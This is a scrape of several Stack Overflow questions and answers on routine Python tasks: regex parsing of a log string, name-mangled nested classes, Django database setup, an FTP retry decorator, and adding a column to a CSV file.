[2016-09-27 20:45:00,002: DEBUG/MainProcess] TaskPool: Apply <function _fast_trace_task at 0x105263950> (args:('ego.celery.account_alerts', '2d464f3a-36f3-4f45-b303-aa477bc30545', [], {}, {'is_eager': False, 'delivery_info': {'exchange': 'celery', 'routing_key': 'celery', 'redelivered': False, 'priority': 0}, 'correlation_id': '2d464f3a-36f3-4f45-b303-aa477bc30545', 'expires': None, 'chord': None, 'task': 'ego.celery.account_alerts', 'timelimit': [None, None], 'callbacks': None, 'headers': {}, 'utc': True, 'errbacks': None, 'eta': None, 'kwargs': {}, 'args': [], 'hostname': 'celery@Slug.local', 'taskset': None, 'group': None, 'retries': 0, 'id': '2d464f3a-36f3-4f45-b303-aa477bc30545', 'reply_to': '656c174e-c251-3e02-8132-df741c11a046'}) kwargs:{})
[2016-09-27 20:45:00,003: DEBUG/MainProcess] Task accepted: ego.celery.account_alerts[2d464f3a-36f3-4f45-b303-aa477bc30545] pid:63321
[2016-09-27 20:45:00,003: INFO/MainProcess] Task ego.celery.account_alerts[2d464f3a-36f3-4f45-b303-aa477bc30545] succeeded in 0.000625498010776937s: 'nothing here, yet'
[2016-09-27 20:46:00,002: INFO/MainProcess] Received task: ego.celery.account_alerts[f8eba8f2-1c48-48bd-a221-2676c735299e]
[2016-09-27 20:46:00,003: DEBUG/MainProcess] TaskPool: Apply <function _fast_trace_task at 0x105263950> (args:('ego.celery.account_alerts', 'f8eba8f2-1c48-48bd-a221-2676c735299e', [], {}, {'is_eager': False, 'delivery_info': {'exchange': 'celery', 'routing_key': 'celery', 'redelivered': False, 'priority': 0}, 'correlation_id': 'f8eba8f2-1c48-48bd-a221-2676c735299e', 'expires': None, 'chord': None, 'task': 'ego.celery.account_alerts', 'timelimit': [None, None], 'callbacks': None, 'headers': {}, 'utc': True, 'errbacks': None, 'eta': None, 'kwargs': {}, 'args': [], 'hostname': 'celery@Slug.local', 'taskset': None, 'group': None, 'retries': 0, 'id': 'f8eba8f2-1c48-48bd-a221-2676c735299e', 'reply_to': '656c174e-c251-3e02-8132-df741c11a046'}) kwargs:{})
[2016-09-27 20:46:00,004: DEBUG/MainProcess] Task accepted: ego.celery.account_alerts[f8eba8f2-1c48-48bd-a221-2676c735299e] pid:63325
[2016-09-27 20:46:00,005: INFO/MainProcess] Task ego.celery.account_alerts[f8eba8f2-1c48-48bd-a221-2676c735299e] succeeded in 0.0016709549818187952s: 'nothing here, yet'
</code></pre>
| 0 | 2016-09-27T20:49:38Z | [
"python",
"django",
"celery"
]
|
Python parse string into Python dictionary of list | 39,732,970 | <p>There are two parts to this question:</p>
<p><strong>I. I'd like to parse a Python string into a list of dictionaries.</strong></p>
<p><strong>Here is the Python string:</strong></p>
<pre><code>../Data.py:92 final computing result as shown below: [historic_list {id: 'A(long) 11A' startdate: 42521 numvaluelist: 0.1065599566767107 datelist: 42521}historic_list {id: 'A(short) 11B' startdate: 42521 numvaluelist: 0.0038113334533441123 datelist: 42521 }historic_list {id: 'B(long) 11C' startdate: 42521 numvaluelist: 20.061623176440904 datelist: 42521}time_statistics {job_id: '' portfolio_id: '112341'} UrlPairList {}]
</code></pre>
<p><strong>Expected Python output:</strong></p>
<pre><code>{
"data" :[
{
"id": "A(long) 11A"
"startdate": "42521"
"numvaluelist": "0.1065599566767107"
},
{
"id": "A(short) 11B"
"startdate": "42521"
"numvaluelist": "0.0038113334533441123"
},
{
"id": "B(long) 11C"
"startdate": "42521"
"numvaluelist": "20.061623176440904"
}
]
}
</code></pre>
<p><strong>II. I need to further parse the key values of id and numvaluelist. I am not sure if there is a better way to do it. Hence, I am converting the string to a Python dictionary, looping through it, and parsing further. Please guide me if I am overthinking the solution.</strong></p>
<p><strong>Update: Code</strong></p>
<pre><code>text = "[historic_list {id: 'A(long) 11A' startdate: 42521 numvaluelist: 0.1065599566767107 datelist: 42521}historic_list {id: 'A(short) 11B' startdate: 42521 numvaluelist: 0.0038113334533441123 datelist: 42521 }historic_list {id: 'B(long) 11C' startdate: 42521 numvaluelist: 20.061623176440904 datelist: 42521}time_statistics {job_id: '' portfolio_id: '112341'} UrlPairList {}]"
data = text.strip("../Data.py:92 final computing result as shown below: ")
print data
</code></pre>
| 0 | 2016-09-27T19:37:24Z | 39,735,003 | <p>Your input raw text looks pretty predictable; try this:</p>
<pre><code>>>> import re
>>> raw = "[historic_list {id: 'A(long) 11A' startdate: 42521 numvaluelist: 0.1065599566767107 datelist: 42521}historic_list {id: 'A(short) 11B' startdate: 42521 numvaluelist: 0.0038113334533441123 datelist: 42521 }historic_list {id: 'B(long) 11C' startdate: 42521 numvaluelist: 20.061623176440904 datelist: 42521}time_statistics {job_id: '' portfolio_id: '112341'} UrlPairList {}]"
>>> line_re = re.compile(r'\{[^\}]+\}')
>>> records = line_re.findall(raw)
>>> record_re = re.compile(
... r"""
... id:\s*\'(?P<id>[^']+)\'\s*
... startdate:\s*(?P<startdate>\d+)\s*
... numvaluelist:\s*(?P<numvaluelist>[\d\.]+)\s*
... datelist:\s*(?P<datelist>\d+)\s*
... """,
... re.X
... )
>>> record_parsed = record_re.search(line_re.findall(raw)[0])
>>> record_parsed.groupdict()
{'startdate': '42521', 'numvaluelist': '0.1065599566767107', 'datelist': '42521', 'id': 'A(long) 11A'}
>>> for record in records:
... record_parsed = record_re.search(record)
... # Here is where you would do whatever you need with the fields.
</code></pre>
<p>To parse the subelements of the id, e.g.:</p>
<pre><code>>>> record_re2 = re.compile(
... r"""
... id:\s*\'
... (?P<id_letter>[A-Z]+)
... \(
... (?P<id_type>[^\)]+)
... \)\s*
... (?P<id_codenum>\d+)
... (?P<id_codeletter>[A-Z]+)
... \'\s*
... startdate:\s*(?P<startdate>\d+)\s*
... numvaluelist:\s*(?P<numvaluelist>[\d\.]+)\s*
... datelist:\s*(?P<datelist>\d+)\s*
... """,
... re.X
... )
>>> record2_parsed = record_re2.search(line_re.findall(raw)[0])
>>> record2_parsed.groupdict()
{'startdate': '42521', 'numvaluelist': '0.1065599566767107', 'id_letter': 'A', 'id_codeletter': 'A', 'datelist': '42521', 'id_type': 'long', 'id_codenum': '11'}
</code></pre>
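<p>To get from the per-record <code>groupdict()</code> results to the <code>{"data": [...]}</code> shape asked for in the question, you can collect the matches in a list comprehension. A sketch that keeps only the three keys shown in the expected output (using a shortened copy of the raw string):</p>

```python
import re

raw = ("[historic_list {id: 'A(long) 11A' startdate: 42521 "
       "numvaluelist: 0.1065599566767107 datelist: 42521}"
       "historic_list {id: 'A(short) 11B' startdate: 42521 "
       "numvaluelist: 0.0038113334533441123 datelist: 42521 }]")

record_re = re.compile(
    r"id:\s*'(?P<id>[^']+)'\s*"
    r"startdate:\s*(?P<startdate>\d+)\s*"
    r"numvaluelist:\s*(?P<numvaluelist>[\d.]+)"
)

# One dict per historic_list record, in order of appearance.
result = {"data": [m.groupdict() for m in record_re.finditer(raw)]}
print(result["data"][0])
# {'id': 'A(long) 11A', 'startdate': '42521', 'numvaluelist': '0.1065599566767107'}
```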
| 1 | 2016-09-27T21:59:57Z | [
"python",
"list",
"loops",
"dictionary"
]
|
python - nested class access modifier | 39,732,985 | <p>I'm trying to make an instance of a <code>__Profile</code> class in the constructor of the <code>__Team</code> class, but I can't get access to <code>__Profile</code>. How should I do it?</p>
<p>This is my code</p>
<pre><code>class SlackApi:
# my work
class __Team:
class __Profile:
def get(self):
# my work
def __init__(self, slackApi):
self.slackApi = slackApi
self.profile = __Profile()
self.profile = __Team.__Profile()
self.profile = SlackApi.__Team.__Profile()
        # I tried all of these cases, but I failed
        # I need to keep the '__Team' and '__Profile' classes private
</code></pre>
<p>My python version is 3.5.1</p>
| 0 | 2016-09-27T19:38:24Z | 39,733,109 | <p>You MAY access like so:</p>
<pre><code>SlackApi._SlackApi__Team._Team__Profile
</code></pre>
<p>or like so:</p>
<pre><code>self._Team__Profile
</code></pre>
<p>But that's just wrong. For your own convenience, don't make them private classes.</p>
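<p>For reference, here is a minimal runnable sketch of why those mangled spellings work (simplified classes of my own, not the OP's full code):</p>

```python
class SlackApi:
    class __Team:                      # bound on SlackApi as _SlackApi__Team
        class __Profile:               # bound on __Team as _Team__Profile
            def get(self):
                return "profile data"

        def __init__(self):
            # Inside the class body, self.__Profile would be mangled to
            # this same spelling automatically.
            self.profile = self._Team__Profile()

team = SlackApi._SlackApi__Team()
print(team.profile.get())  # -> profile data
```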
| 0 | 2016-09-27T19:47:14Z | [
"python",
"nested",
"private",
"python-3.5"
]
|
python - nested class access modifier | 39,732,985 | <p>I'm trying to make an instance of a <code>__Profile</code> class in the constructor of the <code>__Team</code> class, but I can't get access to <code>__Profile</code>. How should I do it?</p>
<p>This is my code</p>
<pre><code>class SlackApi:
# my work
class __Team:
class __Profile:
def get(self):
# my work
def __init__(self, slackApi):
self.slackApi = slackApi
self.profile = __Profile()
self.profile = __Team.__Profile()
self.profile = SlackApi.__Team.__Profile()
        # I tried all of these cases, but I failed
        # I need to keep the '__Team' and '__Profile' classes private
</code></pre>
<p>My python version is 3.5.1</p>
| 0 | 2016-09-27T19:38:24Z | 39,733,134 | <p>Python does not have access modifiers. If you try to treat <code>__</code> like a traditional <code>private</code> access modifier, this is one of the problems you get. Leading double underscores cause name mangling - a name <code>__bar</code> inside a <code>class Foo</code> (or <code>class __Foo</code>, or any number of leading underscores before <code>Foo</code>) will be mangled to <code>_Foo__bar</code>.</p>
<p>If you really want to keep those leading double underscores, you'll have to explicitly mangle the names yourself:</p>
<pre><code>self.profile = SlackApi._SlackApi__Team._Team__Profile()
</code></pre>
<p>This is also how you would access the <code>__Profile</code> class from outside of <code>SlackApi</code> altogether, so you're basically bypassing any pretense that these things are private.</p>
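<p>You can see the mangling directly by inspecting the class namespace (a small demo of my own, not the OP's code):</p>

```python
class Foo:
    class __Bar:
        pass

    def make(self):
        # The bare name __Bar is not in scope here; only the mangled
        # attribute _Foo__Bar exists on the class.
        return Foo._Foo__Bar()

print([k for k in vars(Foo) if "Bar" in k])  # -> ['_Foo__Bar']
print(isinstance(Foo().make(), Foo._Foo__Bar))  # -> True
```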
| 1 | 2016-09-27T19:48:36Z | [
"python",
"nested",
"private",
"python-3.5"
]
|
setup a database in django | 39,733,082 | <p>I followed the Django docs and went through the polls example. I have a SQLite db 'nameinfodb'. I want to access it online by searching last name.
I set up models.py as:</p>
<pre><code>class Infotable(models.Model):
pid_text = models.CharField(max_length=200)
lname_text = models.CharField(max_length=200)
fname_text = models.CharField(max_length=200)
affs_text = models.CharField(max_length=2000)
idlist_text = models.CharField(max_length=2000)
def __str__(self):
return self
</code></pre>
<p>I copied name.info.db to where db.sqlite3 locates, changed settings.py:</p>
<pre><code>DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'name.info.db'),
}
}
</code></pre>
<p>Then I run </p>
<pre><code>python manage.py migrate
python manage.py makemigrations pidb
</code></pre>
<p>Then I checked if I did correctly</p>
<pre><code>$ python manage.py sqlmigrate pidb 0001
BEGIN;
--
-- Create model Choice
--
CREATE TABLE "pidb_choice" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "choice_text" varchar(200) NOT NULL, "votes" integer NOT NULL);
--
-- Create model Question
--
CREATE TABLE "pidb_question" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "question_text" varchar(200) NOT NULL, "pub_date" datetime NOT NULL);
--
-- Add field question to choice
--
ALTER TABLE "pidb_choice" RENAME TO "pidb_choice__old";
CREATE TABLE "pidb_choice" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "choice_text" varchar(200) NOT NULL, "votes" integer NOT NULL, "question_id" integer NOT NULL REFERENCES "pidb_question" ("id"));
INSERT INTO "pidb_choice" ("id", "question_id", "choice_text", "votes") SELECT "id", NULL, "choice_text", "votes" FROM "pidb_choice__old";
DROP TABLE "pidb_choice__old";
CREATE INDEX "pidb_choice_7aa0f6ee" ON "pidb_choice" ("question_id");
COMMIT;
</code></pre>
<p>I didn't see any information about the new database, all I see is the example polls data. Did I do anything wrong here? All I need to do is connect to name.info.db, and access it by last name. Thanks!</p>
| 1 | 2016-09-27T19:45:33Z | 39,733,136 | <p>You need to do it the other way around:</p>
<pre><code>python manage.py makemigrations pidb
python manage.py migrate
</code></pre>
<p><a href="https://docs.djangoproject.com/en/1.10/intro/tutorial02/#activating-models" rel="nofollow">See this part</a> of the tutorial for more information</p>
| 3 | 2016-09-27T19:48:38Z | [
"python",
"django",
"database"
]
|
While loop decorator | 39,733,131 | <p>I am using the <code>ftp</code> library which is incredibly finicky when downloading a bunch of files. This will error about once every 20 tries:</p>
<pre><code>ftp.cwd(locale_dir)
</code></pre>
<p>So, what I do which fixes it is:</p>
<pre><code>while True:
try:
ftp.cwd(locale_dir)
except:
continue
break
</code></pre>
<p>How would I write a python decorator to do this, as I have to do the above on about 10 ftp commands in a script. It would be nice if I could have something like:</p>
<pre><code>retry_on_failure(ftp.cwd(locale_dir))
</code></pre>
| 1 | 2016-09-27T19:48:30Z | 39,733,234 | <p>You may create decorator as:</p>
<pre><code>def retry_on_failure(count=10): # <- default number of attempts is 10
    def retry_function(function):
        def wrapper(*args, **kwargs):
            attempts = count
            func_response = None
            while attempts > 0:
                try:
                    func_response = function(*args, **kwargs)
                    break # <- breaks the while loop on success
                except Exception:
                    attempts -= 1
                    func_response = None
            return func_response
        return wrapper
    return retry_function
</code></pre>
<p>Now create your file download function with this decorator as:</p>
<pre><code>@retry_on_failure(count=20) # <- will make up to 20 attempts if unable to download
def download_file(file_name):
    ftp.cwd(file_name)
</code></pre>
<p>You may use this decorator with any function where you need to make a retry attempt in case of an exception (not just your file download function). This is the beauty of <code>decorators</code>: they are generic and adoptable by any function ;)</p>
<p>In order to make a call to the <code>download_file</code> function, just do: </p>
<pre><code>download_file(file_name)
</code></pre>
| 2 | 2016-09-27T19:55:01Z | [
"python"
]
|
While loop decorator | 39,733,131 | <p>I am using the <code>ftp</code> library which is incredibly finicky when downloading a bunch of files. This will error about once every 20 tries:</p>
<pre><code>ftp.cwd(locale_dir)
</code></pre>
<p>So, what I do which fixes it is:</p>
<pre><code>while True:
try:
ftp.cwd(locale_dir)
except:
continue
break
</code></pre>
<p>How would I write a python decorator to do this, as I have to do the above on about 10 ftp commands in a script. It would be nice if I could have something like:</p>
<pre><code>retry_on_failure(ftp.cwd(locale_dir))
</code></pre>
| 1 | 2016-09-27T19:48:30Z | 39,733,451 | <p>You can't use the syntax you want, because in that code <code>ftp.cwd(locale_dir)</code> gets called before <code>retry_on_failure</code>, so any exception it raises will prevent the <code>retry</code> function from running. You could separate the function and its arguments, however, and call something like <code>retry_on_failure(ftp.cwd, (locale_dir,))</code>.</p>
<p>Here's an implementation that would work with that syntax. (Note, this isn't a decorator, as that's usually meant in Python.)</p>
<pre><code>def retry_on_failure(func, args=(), kwargs={}):
while True:
try:
return func(*args, **kwargs)
except Exception:
pass
</code></pre>
<p>This will of course run forever if the function <em>always</em> raises an exception, so use with care. You could add a limit to the number of repetitions or add logging if you wanted to.</p>
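<p>A bounded variant is a small change. Here is a minimal sketch (the <code>max_attempts</code> parameter is an assumption added here, not part of the original code) that re-raises the last exception once the attempts are exhausted:</p>

```python
def retry_on_failure(func, args=(), kwargs={}, max_attempts=5):
    last_exc = None
    for _ in range(max_attempts):
        try:
            return func(*args, **kwargs)
        except Exception as exc:
            last_exc = exc
    raise last_exc  # give up after max_attempts failed calls


# usage: a flaky function that succeeds on the third call
calls = {"n": 0}

def flaky():
    calls["n"] += 1
    if calls["n"] < 3:
        raise IOError("transient failure")
    return "ok"

print(retry_on_failure(flaky))  # ok
```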
| 1 | 2016-09-27T20:09:25Z | [
"python"
]
|
How to drop columns with empty headers in Pandas? | 39,733,141 | <p>If I have a DF: </p>
<pre><code>Name1 Name2 NUll Name3 NULL Name4
abc abc null abc
abc abc null abc
abc abc null abc
abc abc null abc
</code></pre>
<p>Can I use dropna to keep Name3 as a column with all empty values, yet still drop both Null columns?
Thank you</p>
| -1 | 2016-09-27T19:48:48Z | 39,733,278 | <p>What about using <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.drop.html" rel="nofollow"><code>DataFrame.drop</code></a>?</p>
<pre><code>In [3]: df = pd.read_clipboard()
Out[3]:
Name1 Name2 NUll Name3 NULL Name4
0 abc abc null abc
1 abc abc null abc
2 abc abc null abc
3 abc abc null abc
In [4]: df.drop(["NUll", "NULL"], axis=1)
Out[4]:
Name1 Name2 Name3 Name4
0 abc abc null abc
1 abc abc null abc
2 abc abc null abc
3 abc abc null abc
</code></pre>
| 0 | 2016-09-27T19:58:08Z | [
"python",
"pandas"
]
|
Add a new column to a csv file in python | 39,733,158 | <p>I am trying to add a column to a csv file that combines strings from two other columns. Whenever I try this I either get an output csv with only the new column or an output with all of the original data and not the new column. </p>
<p>This is what I have so far:</p>
<pre><code>with open(filename) as csvin:
readfile = csv.reader(csvin, delimiter=',')
with open(output, 'w') as csvout:
writefile = csv.writer(csvout, delimiter=',', lineterminator='\n')
for row in readfile:
result = [str(row[10]) + ' ' + str(row[11])]
writefile.writerow(result)
</code></pre>
<p>Any help would be appreciated.</p>
| 2 | 2016-09-27T19:49:28Z | 39,733,317 | <p>No input to test, but try this. Your current approach doesn't include the existing data for each row that already exists in your input data. <code>extend</code> will take the list that represents each row and then add another item to that list... equivalent to adding a column.</p>
<pre><code>import csv
with open(filename) as csvin:
readfile = csv.reader(csvin, delimiter=',')
with open(output, 'w') as csvout:
writefile = csv.writer(csvout, delimiter=',', lineterminator='\n')
for row in readfile:
row.extend([str(row[10]) + ' ' + str(row[11])])
writefile.writerow(row)
</code></pre>
| 2 | 2016-09-27T20:00:20Z | [
"python",
"python-2.7",
"csv"
]
|
Add a new column to a csv file in python | 39,733,158 | <p>I am trying to add a column to a csv file that combines strings from two other columns. Whenever I try this I either get an output csv with only the new column or an output with all of the original data and not the new column. </p>
<p>This is what I have so far:</p>
<pre><code>with open(filename) as csvin:
readfile = csv.reader(csvin, delimiter=',')
with open(output, 'w') as csvout:
writefile = csv.writer(csvout, delimiter=',', lineterminator='\n')
for row in readfile:
result = [str(row[10]) + ' ' + str(row[11])]
writefile.writerow(result)
</code></pre>
<p>Any help would be appreciated.</p>
| 2 | 2016-09-27T19:49:28Z | 39,733,574 | <p>I assume that glayne wants to combine column 10 and 11 into one.
In my approach, I concentrate on how to transform a single row first:</p>
<pre><code>def transform_row(input_row):
output_row = input_row[:]
output_row[10:12] = [' '.join(output_row[10:12])]
return output_row
</code></pre>
<p>Once tested to make sure that it works, I can move on to replace all rows:</p>
<pre><code>with open('data.csv') as inf, open('out.csv', 'wb') as outf:
reader = csv.reader(inf)
writer = csv.writer(outf)
writer.writerows(transform_row(row) for row in reader)
</code></pre>
<p>Note that I use the <code>writerows()</code> method to write multiple rows in one statement.</p>
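<p>As a quick sanity check, the same transform can be exercised in memory with <code>io.StringIO</code>. (A sketch in Python 3; the question is tagged python-2.7, where the files would be opened in <code>'rb'</code>/<code>'wb'</code> mode as above.)</p>

```python
import csv
import io

def transform_row(input_row):
    output_row = input_row[:]
    output_row[10:12] = [' '.join(output_row[10:12])]
    return output_row

# one 12-column row: c0,c1,...,c11
src = io.StringIO(",".join("c%d" % i for i in range(12)) + "\n")
out = io.StringIO()
writer = csv.writer(out)
writer.writerows(transform_row(row) for row in csv.reader(src))
print(out.getvalue().strip())  # columns 10 and 11 merged into "c10 c11"
```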
| 0 | 2016-09-27T20:17:16Z | [
"python",
"python-2.7",
"csv"
]
|
Add a new column to a csv file in python | 39,733,158 | <p>I am trying to add a column to a csv file that combines strings from two other columns. Whenever I try this I either get an output csv with only the new column or an output with all of the original data and not the new column. </p>
<p>This is what I have so far:</p>
<pre><code>with open(filename) as csvin:
readfile = csv.reader(csvin, delimiter=',')
with open(output, 'w') as csvout:
writefile = csv.writer(csvout, delimiter=',', lineterminator='\n')
for row in readfile:
result = [str(row[10]) + ' ' + str(row[11])]
writefile.writerow(result)
</code></pre>
<p>Any help would be appreciated.</p>
| 2 | 2016-09-27T19:49:28Z | 39,734,557 | <p>Each row is read as a list, so you can append to it by adding another list (e.g. the new column value). Your current code is simply writing the new column value.</p>
<pre><code>with open('data.csv') as fin, open('out.csv', 'wb') as fout:
reader = csv.reader(fin)
writer = csv.writer(fout)
for row in reader:
new_col_value = [str(row[10]) + ' ' + str(row[11])]
writer.writerow(row + new_col_value)
</code></pre>
| 0 | 2016-09-27T21:26:03Z | [
"python",
"python-2.7",
"csv"
]
|